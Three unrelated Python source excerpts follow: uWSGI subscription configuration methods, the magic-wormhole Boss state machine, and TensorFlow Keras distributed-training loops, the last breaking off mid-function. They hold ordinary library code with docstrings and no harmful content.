* http://uwsgi-docs.readthedocs.io/en/latest/SubscriptionServer.html#mountpoints-uwsgi-2-1
:param bool require_vassal: Require a vassal field (see ``subscribe``) from each subscription.
:param int tolerance: Subscription reclaim tolerance (seconds).
:param int tolerance_inactive: Subscription inactivity tolerance (seconds).
:param bool key_dot_split: Try to fall back to the next part of the (dot-based) subscription key.
Used, for example, in SNI.
"""
# todo notify-socket (fallback) relation
self._set('subscription-notify-socket', client_notify_address)
self._set('subscription-mountpoint', mountpoints_depth)
self._set('subscription-vassal-required', require_vassal, cast=bool)
self._set('subscription-tolerance', tolerance)
self._set('subscription-tolerance-inactive', tolerance_inactive)
self._set('subscription-dotsplit', key_dot_split, cast=bool)
return self._section
def set_server_verification_params(
self, *, digest_algo=None, dir_cert=None, tolerance=None, no_check_uid=None,
dir_credentials=None, pass_unix_credentials=None):
"""Sets peer verification params for subscription server.
These are for secured subscriptions.
:param str digest_algo: Digest algorithm. Example: SHA1
.. note:: Also requires ``dir_cert`` to be set.
:param str dir_cert: Certificate directory.
.. note:: Also requires ``digest_algo`` to be set.
:param int tolerance: Maximum tolerance (in seconds) of clock skew for secured subscription system.
Default: 24h.
:param str|int|list[str|int] no_check_uid: Skip signature check for the specified uids
when using unix sockets credentials.
:param str|list[str] dir_credentials: Directories to search for subscriptions
key credentials.
:param bool pass_unix_credentials: Enable management of SCM_CREDENTIALS in subscriptions UNIX sockets.
"""
if digest_algo and dir_cert:
self._set('subscriptions-sign-check', f'{digest_algo}:{dir_cert}')
self._set('subscriptions-sign-check-tolerance', tolerance)
self._set('subscriptions-sign-skip-uid', no_check_uid, multi=True)
self._set('subscriptions-credentials-check', dir_credentials, multi=True)
self._set('subscriptions-use-credentials', pass_unix_credentials, cast=bool)
return self._section
def set_client_params(
self, *, start_unsubscribed=None, clear_on_exit=None, unsubscribe_on_reload=None,
announce_interval=None):
"""Sets subscribers related params.
:param bool start_unsubscribed: Configure subscriptions but do not send them.
.. note:: Useful with master FIFO.
:param bool clear_on_exit: Force clear instead of unsubscribe during shutdown.
:param bool unsubscribe_on_reload: Force unsubscribe request even during graceful reload.
:param int announce_interval: Send subscription announce at the specified interval. Default: 10 master cycles.
"""
self._set('start-unsubscribed', start_unsubscribed, cast=bool)
self._set('subscription-clear-on-shutdown', clear_on_exit, cast=bool)
self._set('unsubscribe-on-graceful-reload', unsubscribe_on_reload, cast=bool)
self._set('subscribe-freq', announce_interval)
return self._section
def subscribe(
self, server=None, *, key=None, address=None, address_vassal=None,
balancing_weight=None, balancing_algo=None, modifier=None, signing=None, check_file=None, protocol=None,
sni_cert=None, sni_key=None, sni_client_ca=None):
"""Registers a subscription intent.
:param str server: Subscription server address (UDP or UNIX socket).
Examples:
* 127.0.0.1:7171
:param str key: Key to subscribe. Generally the domain name (+ optional '/<mountpoint>').
Examples:
* mydomain.it/foo
* mydomain.it/foo/bar (requires ``mountpoints_depth=2``)
* mydomain.it
* ubuntu64.local:9090
:param str|int address: Address to subscribe (the value for the key)
or zero-based internal socket number (integer).
:param str address_vassal: Vassal node address.
:param int balancing_weight: Load balancing value. Default: 1.
:param balancing_algo: Load balancing algorithm to use. See ``algorithms``.
.. note:: Since 2.1
:param Modifier modifier: Routing modifier object. See ``.routing.modifiers``
:param list|tuple signing: Signing basics, expects two elements list/tuple:
(signing_algorithm, key).
Examples:
* SHA1:idlessh001
:param str check_file: If this file exists the subscription packet is sent,
otherwise it is skipped.
:param str protocol: The protocol to use; by default it is ``uwsgi``.
See ``.networking.socket_types``.
.. note:: Since 2.1
:param str sni_cert: Certificate file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
:param str sni_key: Key file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
:param str sni_client_ca: CA file to use for SNI proxy management.
* http://uwsgi.readthedocs.io/en/latest/SNI.html#subscription-system-and-sni
"""
# todo params: inactive (inactive slot activation)
if not any((server, key)):
raise ConfigurationError('Subscription requires `server` or `key` to be set.')
address_key = 'addr'
if isinstance(address, int):
address_key = 'socket'
if balancing_algo:
backup = getattr(balancing_algo, 'backup_level', None)
if signing:
signing = ':'.join(signing)
if modifier:
modifier1 = modifier
if modifier.submod:
modifier2 = modifier.submod
rule = KeyValue(
filter_locals(locals(), drop=['address_key', 'modifier']),
aliases={
'address': address_key,
'address_vassal': 'vassal',
'signing': 'sign',
'check_file': 'check',
'balancing_weight': 'weight',
'balancing_algo': 'algo',
'protocol': 'proto',
'sni_cert': 'sni_crt',
'sni_client_ca': 'sni_ca',
},
)
self._set('subscribe2', rule)
return self._section
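# A hypothetical usage sketch (the attribute names on `section` are assumed,
# not taken from this module):
#
#     section.subscriptions.subscribe(
#         server='192.168.0.1:7171',
#         key='mydomain.it/foo',
#         address='127.0.0.1:3031',
#         balancing_weight=2,
#     )
#
# which should emit a ``subscribe2`` option roughly like
# ``subscribe2 = server=192.168.0.1:7171,key=mydomain.it/foo,addr=127.0.0.1:3031,weight=2``.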
|
|
from __future__ import absolute_import, print_function, unicode_literals
import re
import six
from attr import attrib, attrs
from attr.validators import instance_of, optional, provides
from automat import MethodicalMachine
from twisted.python import log
from zope.interface import implementer
from . import _interfaces
from ._allocator import Allocator
from ._code import Code, validate_code
from ._dilation.manager import Dilator
from ._input import Input
from ._key import Key
from ._lister import Lister
from ._mailbox import Mailbox
from ._nameplate import Nameplate
from ._order import Order
from ._receive import Receive
from ._rendezvous import RendezvousConnector
from ._send import Send
from ._terminator import Terminator
from ._wordlist import PGPWordList
from .errors import (LonelyError, OnlyOneCodeError, ServerError, WelcomeError,
WrongPasswordError, _UnknownPhaseError)
from .util import bytes_to_dict
@attrs
@implementer(_interfaces.IBoss)
class Boss(object):
_W = attrib()
_side = attrib(validator=instance_of(type(u"")))
_url = attrib(validator=instance_of(type(u"")))
_appid = attrib(validator=instance_of(type(u"")))
_versions = attrib(validator=instance_of(dict))
_client_version = attrib(validator=instance_of(tuple))
_reactor = attrib()
_eventual_queue = attrib()
_cooperator = attrib()
_journal = attrib(validator=provides(_interfaces.IJournal))
_tor = attrib(validator=optional(provides(_interfaces.ITorManager)))
_timing = attrib(validator=provides(_interfaces.ITiming))
m = MethodicalMachine()
set_trace = getattr(m, "_setTrace",
lambda self, f: None) # pragma: no cover
def __attrs_post_init__(self):
self._build_workers()
self._init_other_state()
def _build_workers(self):
self._N = Nameplate()
self._M = Mailbox(self._side)
self._S = Send(self._side, self._timing)
self._O = Order(self._side, self._timing)
self._K = Key(self._appid, self._versions, self._side, self._timing)
self._R = Receive(self._side, self._timing)
self._RC = RendezvousConnector(self._url, self._appid, self._side,
self._reactor, self._journal, self._tor,
self._timing, self._client_version)
self._L = Lister(self._timing)
self._A = Allocator(self._timing)
self._I = Input(self._timing)
self._C = Code(self._timing)
self._T = Terminator()
self._D = Dilator(self._reactor, self._eventual_queue,
self._cooperator)
self._N.wire(self._M, self._I, self._RC, self._T)
self._M.wire(self._N, self._RC, self._O, self._T)
self._S.wire(self._M)
self._O.wire(self._K, self._R)
self._K.wire(self, self._M, self._R)
self._R.wire(self, self._S)
self._RC.wire(self, self._N, self._M, self._A, self._L, self._T)
self._L.wire(self._RC, self._I)
self._A.wire(self._RC, self._C)
self._I.wire(self._C, self._L)
self._C.wire(self, self._A, self._N, self._K, self._I)
self._T.wire(self, self._RC, self._N, self._M, self._D)
self._D.wire(self._S, self._T)
def _init_other_state(self):
self._did_start_code = False
self._next_tx_phase = 0
self._next_rx_phase = 0
self._rx_phases = {} # phase -> plaintext
self._next_rx_dilate_seqnum = 0
self._rx_dilate_seqnums = {} # seqnum -> plaintext
self._result = "empty"
# these methods are called from outside
def start(self):
self._RC.start()
def _print_trace(self, old_state, input, new_state, client_name, machine,
file):
if new_state:
print(
"%s.%s[%s].%s -> [%s]" % (client_name, machine, old_state,
input, new_state),
file=file)
else:
# the RendezvousConnector emits message events as if
# they were state transitions, except that old_state
# and new_state are empty strings. "input" is one of
# R.connected, R.rx(type phase+side), R.tx(type
# phase), R.lost .
print("%s.%s.%s" % (client_name, machine, input), file=file)
file.flush()
def output_tracer(output):
print(" %s.%s.%s()" % (client_name, machine, output), file=file)
file.flush()
return output_tracer
def _set_trace(self, client_name, which, file):
names = {
"B": self,
"N": self._N,
"M": self._M,
"S": self._S,
"O": self._O,
"K": self._K,
"SK": self._K._SK,
"R": self._R,
"RC": self._RC,
"L": self._L,
"A": self._A,
"I": self._I,
"C": self._C,
"T": self._T
}
for machine in which.split():
t = (lambda old_state, input, new_state, machine=machine:
self._print_trace(old_state, input, new_state,
client_name=client_name,
machine=machine, file=file))
names[machine].set_trace(t)
if machine == "I":
self._I.set_debug(t)
# def serialize(self):
# raise NotImplemented
# and these are the state-machine transition functions, which don't take
# args
@m.state(initial=True)
def S0_empty(self):
pass # pragma: no cover
@m.state()
def S1_lonely(self):
pass # pragma: no cover
@m.state()
def S2_happy(self):
pass # pragma: no cover
@m.state()
def S3_closing(self):
pass # pragma: no cover
@m.state(terminal=True)
def S4_closed(self):
pass # pragma: no cover
# from the Wormhole
# input/allocate/set_code are regular methods, not state-transition
# inputs. We expect them to be called just after initialization, while
# we're in the S0_empty state. You must call exactly one of them, and the
# call must happen while we're in S0_empty, which makes them good
# candidates for being a proper @m.input, but set_code() will immediately
# (reentrantly) cause self.got_code() to be fired, which is messy. These
# are all passthroughs to the Code machine, so one alternative would be
# to have Wormhole call Code.{input,allocate,set_code} instead, but that
# would require the Wormhole to be aware of Code (whereas right now
# Wormhole only knows about this Boss instance, and everything else is
# hidden away).
def input_code(self):
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
return self._C.input_code()
def allocate_code(self, code_length):
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
wl = PGPWordList()
self._C.allocate_code(code_length, wl)
def set_code(self, code):
validate_code(code) # can raise KeyFormatError
if self._did_start_code:
raise OnlyOneCodeError()
self._did_start_code = True
self._C.set_code(code)
def dilate(self, transit_relay_location=None, no_listen=False):
return self._D.dilate(transit_relay_location, no_listen=no_listen) # fires with endpoints
@m.input()
def send(self, plaintext):
pass
@m.input()
def close(self):
pass
# from RendezvousConnector:
# * "rx_welcome" is the Welcome message, which might signal an error, or
# our welcome_handler might signal one
# * "rx_error" is error message from the server (probably because of
# something we said badly, or due to CrowdedError)
# * "error" is when an exception happened while it tried to deliver
# something else
def rx_welcome(self, welcome):
try:
if "error" in welcome:
raise WelcomeError(welcome["error"])
# TODO: it'd be nice to not call the handler when we're in
# S3_closing or S4_closed states. I tried to implement this with
# rx_welcome as an @input, but in the error case I'd be
# delivering a new input (rx_error or something) while in the
# middle of processing the rx_welcome input, and I wasn't sure
# Automat would handle that correctly.
self._W.got_welcome(welcome) # TODO: let this raise WelcomeError?
except WelcomeError as welcome_error:
self.rx_unwelcome(welcome_error)
@m.input()
def rx_unwelcome(self, welcome_error):
pass
@m.input()
def rx_error(self, errmsg, orig):
pass
@m.input()
def error(self, err):
pass
# from Code (provoked by input/allocate/set_code)
@m.input()
def got_code(self, code):
pass
# Key sends (got_key, scared)
# Receive sends (got_message, happy, got_verifier, scared)
@m.input()
def happy(self):
pass
@m.input()
def scared(self):
pass
def got_message(self, phase, plaintext):
assert isinstance(phase, type("")), type(phase)
assert isinstance(plaintext, type(b"")), type(plaintext)
d_mo = re.search(r'^dilate-(\d+)$', phase)
if phase == "version":
self._got_version(plaintext)
elif d_mo:
self._got_dilate(int(d_mo.group(1)), plaintext)
elif re.search(r'^\d+$', phase):
self._got_phase(int(phase), plaintext)
else:
# Ignore unrecognized phases, for forwards-compatibility. Use
# log.err so tests will catch surprises.
log.err(_UnknownPhaseError("received unknown phase '%s'" % phase))
@m.input()
def _got_version(self, plaintext):
pass
@m.input()
def _got_phase(self, phase, plaintext):
pass
@m.input()
def _got_dilate(self, seqnum, plaintext):
pass
@m.input()
def got_key(self, key):
pass
@m.input()
def got_verifier(self, verifier):
pass
# Terminator sends closed
@m.input()
def closed(self):
pass
@m.output()
def do_got_code(self, code):
self._W.got_code(code)
@m.output()
def process_version(self, plaintext):
# most of this is wormhole-to-wormhole, ignored for now
# in the future, this is how Dilation is signalled
self._their_versions = bytes_to_dict(plaintext)
self._D.got_wormhole_versions(self._their_versions)
# but this part is app-to-app
app_versions = self._their_versions.get("app_versions", {})
self._W.got_versions(app_versions)
@m.output()
def S_send(self, plaintext):
assert isinstance(plaintext, type(b"")), type(plaintext)
phase = self._next_tx_phase
self._next_tx_phase += 1
self._S.send("%d" % phase, plaintext)
@m.output()
def close_unwelcome(self, welcome_error):
# assert isinstance(err, WelcomeError)
self._result = welcome_error
self._T.close("unwelcome")
@m.output()
def close_error(self, errmsg, orig):
self._result = ServerError(errmsg)
self._T.close("errory")
@m.output()
def close_scared(self):
self._result = WrongPasswordError()
self._T.close("scary")
@m.output()
def close_lonely(self):
self._result = LonelyError()
self._T.close("lonely")
@m.output()
def close_happy(self):
self._result = "happy"
self._T.close("happy")
@m.output()
def W_got_key(self, key):
self._W.got_key(key)
@m.output()
def D_got_key(self, key):
self._D.got_key(key)
@m.output()
def W_got_verifier(self, verifier):
self._W.got_verifier(verifier)
@m.output()
def W_received(self, phase, plaintext):
assert isinstance(phase, six.integer_types), type(phase)
# we call Wormhole.received() in strict phase order, with no gaps
self._rx_phases[phase] = plaintext
while self._next_rx_phase in self._rx_phases:
self._W.received(self._rx_phases.pop(self._next_rx_phase))
self._next_rx_phase += 1
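# For example, if phase 1 arrives before phase 0, it is buffered in
# self._rx_phases and only delivered to the Wormhole once phase 0 shows up.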
@m.output()
def D_received_dilate(self, seqnum, plaintext):
assert isinstance(seqnum, six.integer_types), type(seqnum)
# strict phase order, no gaps
self._rx_dilate_seqnums[seqnum] = plaintext
while self._next_rx_dilate_seqnum in self._rx_dilate_seqnums:
m = self._rx_dilate_seqnums.pop(self._next_rx_dilate_seqnum)
self._D.received_dilate(m)
self._next_rx_dilate_seqnum += 1
@m.output()
def W_close_with_error(self, err):
self._result = err # exception
self._W.closed(self._result)
@m.output()
def W_closed(self):
# result is either "happy" or a WormholeError of some sort
self._W.closed(self._result)
S0_empty.upon(close, enter=S3_closing, outputs=[close_lonely])
S0_empty.upon(send, enter=S0_empty, outputs=[S_send])
S0_empty.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S0_empty.upon(got_code, enter=S1_lonely, outputs=[do_got_code])
S0_empty.upon(rx_error, enter=S3_closing, outputs=[close_error])
S0_empty.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S1_lonely.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S1_lonely.upon(happy, enter=S2_happy, outputs=[])
S1_lonely.upon(scared, enter=S3_closing, outputs=[close_scared])
S1_lonely.upon(close, enter=S3_closing, outputs=[close_lonely])
S1_lonely.upon(send, enter=S1_lonely, outputs=[S_send])
S1_lonely.upon(got_key, enter=S1_lonely, outputs=[W_got_key, D_got_key])
S1_lonely.upon(rx_error, enter=S3_closing, outputs=[close_error])
S1_lonely.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S2_happy.upon(rx_unwelcome, enter=S3_closing, outputs=[close_unwelcome])
S2_happy.upon(got_verifier, enter=S2_happy, outputs=[W_got_verifier])
S2_happy.upon(_got_phase, enter=S2_happy, outputs=[W_received])
S2_happy.upon(_got_version, enter=S2_happy, outputs=[process_version])
S2_happy.upon(_got_dilate, enter=S2_happy, outputs=[D_received_dilate])
S2_happy.upon(scared, enter=S3_closing, outputs=[close_scared])
S2_happy.upon(close, enter=S3_closing, outputs=[close_happy])
S2_happy.upon(send, enter=S2_happy, outputs=[S_send])
S2_happy.upon(rx_error, enter=S3_closing, outputs=[close_error])
S2_happy.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S3_closing.upon(rx_unwelcome, enter=S3_closing, outputs=[])
S3_closing.upon(rx_error, enter=S3_closing, outputs=[])
S3_closing.upon(got_verifier, enter=S3_closing, outputs=[])
S3_closing.upon(_got_phase, enter=S3_closing, outputs=[])
S3_closing.upon(_got_version, enter=S3_closing, outputs=[])
S3_closing.upon(_got_dilate, enter=S3_closing, outputs=[])
S3_closing.upon(happy, enter=S3_closing, outputs=[])
S3_closing.upon(scared, enter=S3_closing, outputs=[])
S3_closing.upon(close, enter=S3_closing, outputs=[])
S3_closing.upon(send, enter=S3_closing, outputs=[])
S3_closing.upon(closed, enter=S4_closed, outputs=[W_closed])
S3_closing.upon(error, enter=S4_closed, outputs=[W_close_with_error])
S4_closed.upon(rx_unwelcome, enter=S4_closed, outputs=[])
S4_closed.upon(got_verifier, enter=S4_closed, outputs=[])
S4_closed.upon(_got_phase, enter=S4_closed, outputs=[])
S4_closed.upon(_got_version, enter=S4_closed, outputs=[])
S4_closed.upon(_got_dilate, enter=S4_closed, outputs=[])
S4_closed.upon(happy, enter=S4_closed, outputs=[])
S4_closed.upon(scared, enter=S4_closed, outputs=[])
S4_closed.upon(close, enter=S4_closed, outputs=[])
S4_closed.upon(send, enter=S4_closed, outputs=[])
S4_closed.upon(error, enter=S4_closed, outputs=[])
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Part of the Keras training engine related to distributed training.
"""
# pylint: disable=protected-access
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import callbacks as cbks
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import distributed_training_utils
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribute as distribute_lib
# TODO(priyag, sourabhbajaj): Refactor this file to address code duplication.
def fit_loop(
model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
val_iterator=None,
initial_epoch=0,
steps_per_epoch=None,
validation_steps=None):
"""Fit loop for training with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
val_iterator: Iterator for validation data.
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
validation_steps: Number of steps to run validation for
(only if doing validation from data tensors).
Ignored with the default value of `None`.
Returns:
`History` object.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_fit_loop(
model, iterator, epochs, verbose, callbacks, initial_epoch,
steps_per_epoch)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy, make_callback_model=True)
def _per_device_train_function(model):
model._make_train_function()
return (model.train_function.inputs,
model.train_function.outputs,
model.train_function.updates_op,
model.train_function.session_kwargs)
inputs, targets = _get_input_from_iterator(iterator, model)
with current_strategy.scope():
# Create train ops on each of the devices when we call
# `_per_device_train_function`.
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_train_function, model._grouped_model)
# Unwrap all the per device values returned from `call_for_each_tower`.
# Unwrapping per device values gives you a list of values that can be
# used to construct a new train function that is composed of update ops on
# all the devices over which the model is distributed.
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args, with_loss_tensor=True)
# Dataset inputs and targets are also per devices values that need to be
# unwrapped.
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
dataset_targets = distributed_training_utils.flatten_perdevice_values(
current_strategy, targets)
# Create a train function that is composed of all the parameters above.
distributed_train_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_train_function',
**all_session_args)
# We need to set sample_weights to None since there are sample weight
# placeholders that are created with default values.
sample_weights = [None for _ in range(len(model.outputs) *
current_strategy.num_towers)]
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + dataset_targets + sample_weights + [1]
else:
ins = dataset_inputs + dataset_targets
do_validation = False
if validation_steps:
do_validation = True
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=do_validation,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
out_labels = model.metrics_names or []
callbacks.on_train_begin()
assert steps_per_epoch is not None
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
for step_index in range(steps_per_epoch):
batch_logs = {'batch': step_index, 'size': 1}
callbacks.on_batch_begin(step_index, batch_logs)
try:
outs = distributed_train_function(ins)
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
                        'batches (in this case, %d batches).' %
                        (steps_per_epoch * epochs))
break
if not isinstance(outs, list):
outs = [outs]
outs = _aggregate_metrics_across_towers(
current_strategy.num_towers, out_labels, outs)
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(step_index, batch_logs)
if callbacks.model.stop_training:
break
if do_validation:
val_outs = test_loop(
model,
val_iterator,
steps=validation_steps,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# Same labels assumed.
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
return model.history
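# A rough usage sketch of how execution reaches fit_loop() (assumption: the
# TF 1.11-era API where `Model.compile` accepted a `distribute=` strategy and
# `model.fit` dispatched dataset inputs here; names are illustrative):
#
#   strategy = tf.contrib.distribute.MirroredStrategy()
#   model.compile(optimizer='sgd', loss='mse', distribute=strategy)
#   dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(32).repeat()
#   model.fit(dataset, epochs=2, steps_per_epoch=10)  # routed to fit_loop()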
def _experimental_fit_loop(
model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
initial_epoch=0,
steps_per_epoch=None):
"""Fit loop for training with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator that returns inputs and targets
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
before declaring one epoch finished and starting the
next epoch. Ignored with the default value of `None`.
Returns:
      `None`.
Raises:
ValueError: in case of invalid arguments.
"""
current_strategy = model._distribution_strategy
# TODO(priyag): Add validation that shapes are fully defined for TPU case.
K.get_session().run(current_strategy.initialize())
def _per_device_train_function(model):
model._make_train_function()
return (model.train_function.inputs,
model.train_function.outputs,
model.train_function.updates_op,
model.train_function.session_kwargs)
# TODO(priyag, sourabhbajaj): This should likely not be hardcoded here.
K.set_learning_phase(1)
def step_fn(ctx, inputs, targets):
"""Clones the model and calls make_train_function."""
# TODO(priyag, sourabhbajaj): The model gets cloned every time
# fit/test/predict is called. We should look into caching this keyed on
# input shapes.
clone_model_on_towers(
model,
current_strategy,
make_callback_model=True,
inputs=inputs,
targets=targets)
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_train_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs,
grouped_updates, grouped_session_args)
combined_fn = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_train_function',
**all_session_args)
out_labels = model.metrics_names or []
for label, output in zip(out_labels, combined_fn.outputs):
if label == 'loss':
aggregation = distribute_lib.get_loss_reduction()
else:
        # We aggregate all other metrics using mean for now. This is a
        # temporary workaround until new metrics are in place.
aggregation = variable_scope.VariableAggregation.MEAN
ctx.set_last_step_output(label, output, aggregation)
# TODO(priyag, sourabhbajaj): Ignoring these things from the combined_fn:
# feed_dict, session kwargs, run options, run_metadata for now. These should
    # be handled appropriately.
return combined_fn.updates_op
# Add initial dummy values for loss and other metric tensors.
initial_loop_values = {}
initial_loop_values['loss'] = constant_op.constant(1e7)
for name, tensor in zip(model.metrics_names[1:], model.metrics_tensors):
initial_loop_values[name] = array_ops.zeros(tensor.shape, tensor.dtype)
with current_strategy.scope():
# TODO(priyag, sourabhbajaj): Adjust steps_per_run appropriately based on
# steps_per_epoch and number of epochs.
ctx = current_strategy.run_steps_on_dataset(
step_fn, iterator, iterations=current_strategy.steps_per_run,
initial_loop_values=initial_loop_values)
train_op = ctx.run_op
output_tensors = ctx.last_step_outputs
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps_per_epoch is not None
# TODO(sourabhbajaj): Convert this into a proper validation function
if callbacks:
raise NotImplementedError(
'Callbacks are not supported with TPUStrategy right now.')
callbacks = cbks.configure_callbacks(
callbacks,
model,
do_validation=False,
val_inputs=None,
val_targets=None,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
verbose=verbose)
# TODO(priyag, sourabhbajaj): Add callbacks support for per step callback
# TODO(priyag, sourabhbajaj): Fix the number of steps run with steps_per_run
# TODO(priyag, sourabhbajaj): Add validation.
callbacks.on_train_begin()
for epoch in range(initial_epoch, epochs):
callbacks.on_epoch_begin(epoch)
epoch_logs = {}
for step_index in range(0, steps_per_epoch, current_strategy.steps_per_run):
# TODO(sourabhbajaj): Replace size with a combination of steps_per_run
# and batch_size
batch_logs = {'batch': step_index, 'size': 1}
callbacks.on_batch_begin(step_index, batch_logs)
try:
_, outputs = K.get_session().run([train_op, output_tensors])
except errors.OutOfRangeError:
logging.warning('Your dataset iterator ran out of data; '
'interrupting training. Make sure that your dataset '
'can generate at least `steps_per_epoch * epochs` '
                      'batches (in this case, %d batches).' %
                      (steps_per_epoch * epochs))
break
batch_logs.update(outputs)
callbacks.on_batch_end(step_index, batch_logs)
if callbacks.model.stop_training:
break
callbacks.on_epoch_end(epoch, epoch_logs)
if callbacks.model.stop_training:
break
callbacks.on_train_end()
# Copy the weights back from the replicated model to the original model.
with current_strategy.scope():
updated_weights = current_strategy.unwrap(
model._grouped_model)[0].get_weights()
model.set_weights(updated_weights)
K.get_session().run(current_strategy.finalize())
return model.history
def test_loop(model, iterator, verbose=0, steps=None):
"""Test loop for evaluating with DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator for input data.
verbose: Integer, Verbosity mode 0 or 1.
steps: Total number of steps (batches of samples)
before declaring predictions finished.
Ignored with the default value of `None`.
Returns:
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the outputs.
"""
current_strategy = model._distribution_strategy
# TODO(priyag, sourabhbajaj): Remove this when the codepaths are merged.
if current_strategy.__class__.__name__ == 'TPUStrategy':
return _experimental_test_loop(model, iterator, verbose, steps)
if not model._grouped_model:
clone_model_on_towers(model, current_strategy)
def _per_device_test_function(model):
model._make_test_function()
return (model.test_function.inputs,
model.test_function.outputs,
model.test_function.updates_op,
model.test_function.session_kwargs)
inputs, targets = _get_input_from_iterator(iterator, model)
with current_strategy.scope():
(grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args) = current_strategy.call_for_each_tower(
_per_device_test_function, model._grouped_model)
(all_inputs, all_outputs, all_updates,
all_session_args) = distributed_training_utils.unwrap_values(
current_strategy, grouped_inputs, grouped_outputs, grouped_updates,
grouped_session_args, with_loss_tensor=True)
dataset_inputs = distributed_training_utils.flatten_perdevice_values(
current_strategy, inputs)
dataset_targets = distributed_training_utils.flatten_perdevice_values(
current_strategy, targets)
distributed_test_function = K.Function(
all_inputs, all_outputs,
updates=all_updates,
name='distributed_test_function',
**all_session_args)
# We need to set sample_weights to None since there are sample weight
# placeholders that are created with default values.
sample_weights = [None for _ in range(len(model.outputs) *
current_strategy.num_towers)]
if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = dataset_inputs + dataset_targets + sample_weights + [0]
else:
ins = dataset_inputs + dataset_targets
outs = []
if verbose == 1:
progbar = Progbar(target=steps)
# Copy the weights from the original model to each of the replicated models.
orig_model_weights = model.get_weights()
with current_strategy.scope():
distributed_model = current_strategy.unwrap(model._grouped_model)[0]
distributed_training_utils.set_weights(
current_strategy, distributed_model, orig_model_weights)
assert steps is not None
for step in range(steps):
batch_outs = distributed_test_function(ins)
batch_outs = _aggregate_metrics_across_towers(
current_strategy.num_towers, model.metrics_names, batch_outs)
if isinstance(batch_outs, list):
if step == 0:
outs = [0.] * len(batch_outs)
